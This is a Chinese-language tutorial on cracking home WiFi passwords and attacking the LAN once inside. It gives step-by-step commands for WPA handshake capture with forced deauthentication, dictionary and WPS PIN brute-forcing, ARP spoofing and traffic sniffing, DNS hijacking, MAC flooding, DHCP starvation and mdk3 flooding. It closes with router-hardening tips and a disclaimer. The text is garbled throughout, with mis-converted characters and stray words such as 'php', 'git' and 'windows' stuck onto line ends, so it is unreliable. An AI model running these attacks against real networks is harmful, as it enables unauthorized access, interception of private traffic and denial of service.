wifi渗透

前言

本文主要讲述 家庭家庭家庭中(重要的事情说三遍,企业认证服务器的wifi通常很是很是的安全破解不来)如何破解wifi密码,破解wifi密码后的内网渗透利用(简单说明),如何设置wifi路由器更安全,从渗透的方面看wifi安全,根据需求选择观看php

wifi渗透环境的打造

硬件方面

须要支持监听模式的无线网卡,通常电脑自带的无线网卡是不支持监听模式的,须要购买
内置kail驱动 RT3070 RTL8187(推荐使用)
我购买的连接以下,用着还行,监听信号比手机强那么一点点
https://m.tb.cn/h.VGGIItU?sm=0b7bf6html

软件方面

由于wifi破解须要软件支持,Windows下载麻烦,推荐kali(由于kali自带不少工具)
由于用到kali,建议使用vmware虚拟机,不建议小白双系统kali或者Microsoft Store中的kali
vmware下载查看:https://www.52pojie.cn/thread-1026907-1-1.html
注意:无线网卡监听模式时若是出现vmware卡代码,监听时间长就中止的状况建议更换上面这个文章的vmware版本
kali的vm镜像下载,下载解压,vmware打开便可使用,下载地址: https://images.offensive-security.com/virtual-images/kali-linux-2020.2a-vmware-amd64.7z?_ga=2.152625529.1921388440.1596879427-46569499.1595490768linux

vmware和kali和无线网卡基础知识(选看)

USB无线网卡在kali Linux的使用

  1. 先不要开机 先打开服务
  2. 运行下图的
  3. 开机kali后 虚拟机选择网卡的链接
  4. ifconfig 查看链接通常名字为wlan,但有肯能无线网卡处于down状态可用ifconfig -a查看,而后使ifconfig name up便可

无线网卡通常有四种工做模式,即 Managed,Master,Ad-hoc,Monitor。

Managed 模式:该模式用于你的无线客户端直接与无线接入点(Access Point,即AP)进行接入链接。在这个模式中,咱们能够进行无线接入internet上网,无线网卡的驱动程序依赖无线AP管理整个通讯过程。
Master 模式:一些无线网卡支持Master模式。这个模式容许无线网卡使用特制的驱动程序和软件工做,做为其余设备的无线AP。它主要使用于无线接入点AP提供无线接入服务以及路由功能。好比无线路由器就是工做在Master模式下了,对于普通的pc机来讲,若是有合适的硬件它也能够变成一台无线AP。
Ad hoc模式:当你的网络由互相直连的设备组成时,就使用这个模式。在这个模式中,各设备之间采用对等网络的方式进行链接,无线通讯双方共同承担无线AP的职责。
Monitor 模式:Monitor模式主要用于监控无线网络内部的流量,用于检查网络和排错。要使Wireshark捕获无线数据包,你的无线网卡和配套驱动程序必须支持监听模式(也叫RFMON模式)。git

kali桥接网卡上网


参见:https://www.linuxidc.com/Linux/2016-09/135521p3.htmgithub

wifi密码的破解

由于wep加密已经没有使用的,很是不安全,就忽略了web

最简单最好用的wifi密码破解方法

使用wifi万能钥匙,腾讯wifi管家等等,其原理就是wifi密码共享,使用过该软件会将你的链接过的wifi密码共享出去,其自己不是破解而是共享制,链接后咱们就能够看见密码了,因此这种破解方法很是的好用,首先推荐算法

基础说明airodump-ng

airmon-ng start wlan0     开启监听模式
airodump-ng wlan0mon      开始扫描附近wifi

airodump-ng wlan0mon参数:
-w 输出文件
--ivs 只保存ivs,再也不保存全部无线数据,只是保存能够用于破解的IVS数据报文
-c 指定信道
--bssid 指定路由的bssid也就是MAC地址
--essid 指定路由的essid,能够理解为wifi名称(不许确)
airodump-ng wlan0mon 扫描参数

BSSID AP的MAC地址
PWR 信号强度接近0信号好
Beacons 无线ap的发送通告,告诉我是谁 周期发送
#Data 抓到的数据包
CH 信道
MB 最大传输速度
ENC 加密方法
CIPHER 加密算法
AUTH 认证协议
ESSID 通指wifi名字 <length: >表示未广播
STATION 客户端
RATE 传输速率
Lost 最近10秒的丢包数
Frames 来自客户端的数据
Probes 主动弹出 若是客户端正试图链接一个AP但没有连上,会显示这里
Aircrack-ng工具包数据库

  • aircrack-ng 破解
  • airmon-ng 改变网卡工做模式
  • airodump-ng 捕获报文
  • aireplay-ng 提供各类攻击
  • airserv-ng 网卡链接到指定端口 用做无限跳板
  • airolib-ng 彩虹表破解建立数据库文件
  • airdecap-ng 解包

WPA破解

指定监听的wifi
airodump-ng -w [文件] --bssid [wifibssid] -c [信道最好指定] wlan0mon

管理针攻击将其余用户踢下线
aireplay-ng -0 5 -a [路由bssid] -c [客户端STATION] wlan0mon

管理针攻击得到握手包

若是出现错误可尝试
--ignore-negative-one 忽略-1信道
根据握手包暴力破解密码
aircrack-ng -w [密码字典] [握手包.cap]



根据握手包破解密码加速
这里推荐使用windows下GPU加速工具EWSA,还有其余加速方式不过我不怎么推荐,也能够找专业的跑包团队来跑包
EWSA下载和使用说明地址:https://www.52pojie.cn/thread-989800-1-1.html
找跑包地址:https://www.anywlan.com/forum-134-1.htmlwindows

ping攻击 前提路由器开启wps

8位ping码,第8位数是校验码,只须要破解七位,ping码分前部分(4位)后部分(3位),pin认证链接失败,路由器返回EAP-NACK信息,经过回应,可以肯定pin的前部分或后部分是否正确,因此可能性是11000(104+103),不过考虑信号和路由器的处理性能网卡功率等可能时间会长,若是信号好,网卡,路由器也比较好通常须要6个小时左右
查看开启wps的wifi安全

wash -i wlan0mon


reaver -I wlan0mon -b [BSSID] -vv 还能够加其余参数 进行爆破

kali自动化工具wifite

原理:就是上面的命令只不过是自动化了
使用:cmd输入wifite进入扫描

以为扫描好了ctrl+c就好,按照序号选择要破解的wifi便可,根据wifi开启了啥会进行自动的破解,若是想跳过某个破解方式按ctrl+c便可,若是获取到握手包自带的密码字典没跑出来,能够去上面提醒的路径找握手包,用本身的字典跑

突破限制

mac地址限制

扫描查看已链接的客户机的mac地址将网卡的mac地址改成其便可
先down掉网卡
ifconfig wlan0 down
修改mac地址
macchanger wlan0 -m [须要修改的mac地址,有些网卡可能不支持修改]
启动网卡
ifconfig wlan0 up

未广播ssid的wifi

1.等待其余用户链接,会先询问ssid
airodump-ng wlan0mon 就能看见
2.将别人踢下线,让其重连,和抓起握手包同样,注意信道
aireplay-ng -0 5 -a [路由bssid] -c [客户端STATION]

链接wifi后的利用(内网渗透)

ARP欺骗

查看内网的主机
nmap -sP 192.168.1.0/24 -v

开启转发模式

echo 1 > /proc/sys/net/ipv4/ip_forward

双向欺骗分别是目标主机ip和网关
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1


启动wireshare查看ip.src == 192.168.1.106,发现欺骗成功能够拦截他的访问

driftnet -i eth0 监听图片

毒化内网用户没法上网

原理:进行arp欺骗但不进行转发
echo 0 > /proc/sys/net/ipv4/ip_forward
双向欺骗
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1

dns劫持

目标主机window7 ip地址 192.168.124.128
攻击机kali ip地址 192.168.124.139
劫持到web服务window10(phpstudy) ip地址 192.168.1.104
修改配置文件nano /etc/ettercap/etter.dns

ettercap -Tq -i eth0 -P dns_spoof /// ///
进行欺骗-i后是无线网卡 ///中加目标主机和网卡,不加就是所有,发现window7被劫持成功,若是安装杀毒软件可能劫持不了


如何恢复

ipconfig/flushdns刷新便可

mac地址表泛红

交换机中有mac地址表记录链接的pc,攻击者不断刷新mac地址来填满交换机的mac地址表,交换机在mac地址表找不到该用户只能经过广播的形式发送,攻击者就能够截获数据
交换机设置静态mac地址绑定可预防,非表内请求将所有丢弃

macof -i eth0

dhcp地址耗尽攻击

路由器分配ip,攻击者发送大量discover包来获取ip让其者无ip使用,没法链接
先安装
apt-get install yersinia
启动
yersinia -G

干扰通信

如下利用前提无线网卡要开启监听模式

建立恶意的无线热点

工具mdk3 mdk3可查看使用说明

mdk3 wlan0mon b -n SSID (-f 能够导入列表建立多个ssidwifi,不指定则随机) -c [信道] -w -g -s 100

验证洪水攻击(攻击路由器)

伪造大量的client去链接ap,可致使正在已链接用户无反应 -a后加交换机ssid

mdk3 wlan0mon a -a FC:D7:33:DE:F3:8A -c  -s 300

强制解除验证洪水攻击方式(针对客户机使其下线,经过模仿管理针)

就是以前抓握手包同样将别人踢下线

aireplay-ng -0 5 -a [路由bssid] -c [客户端STATION] wlan0mon

用mdk3针对全网,在攻击中踢掉线后也没法链接成功

mdk3 wlan0mon d

可-b 加文件指定mac地址攻击

如何设置路由器更安全

攻与防护自己就是一场博弈根据上面的攻击方式咱们能够设置路由器是wifi更安全尤为是物联网的发展,家里的不少东西都要链接网络

  1. wifi加密方式采用wpa加密,不用采用wpe加密,若是不懂wps,也不要开启wps功能
  2. wifi密码要不要使用弱口令
  3. 对于经常使用设备能够进行ip和mac的绑定
  4. 若是没有用户之间相互访问的需求能够开启ap隔离
  5. 能够设置访客wifi,防止密码被泄露
  6. 就是选用一些比较好的路由器,防止路由器自己存在漏洞,路由器页面就是web页面可能存在漏洞
  7. 尽可能少使用wifi万能钥匙,腾讯wifi管家等,或者使用时找到里面的设置不共享本身的wifi密码

参考文章

b站:https://www.bilibili.com/video/BV1e7411o7GB?p=1
b站:https://www.bilibili.com/video/BV14z4y1Q7Nb?from=search&seid=10037556429710890008
论坛:https://www.anywlan.com/
等等等不少前辈的文章,无法都列举(找不到了),表示抱歉和感谢
最后欢迎访问个人我的博客:https://lmg66.github.io/ 说明:本文仅限技术研究与讨论,严禁用于非法用途,不然产生的一切后果自行承担

相关文章
相关标签/搜索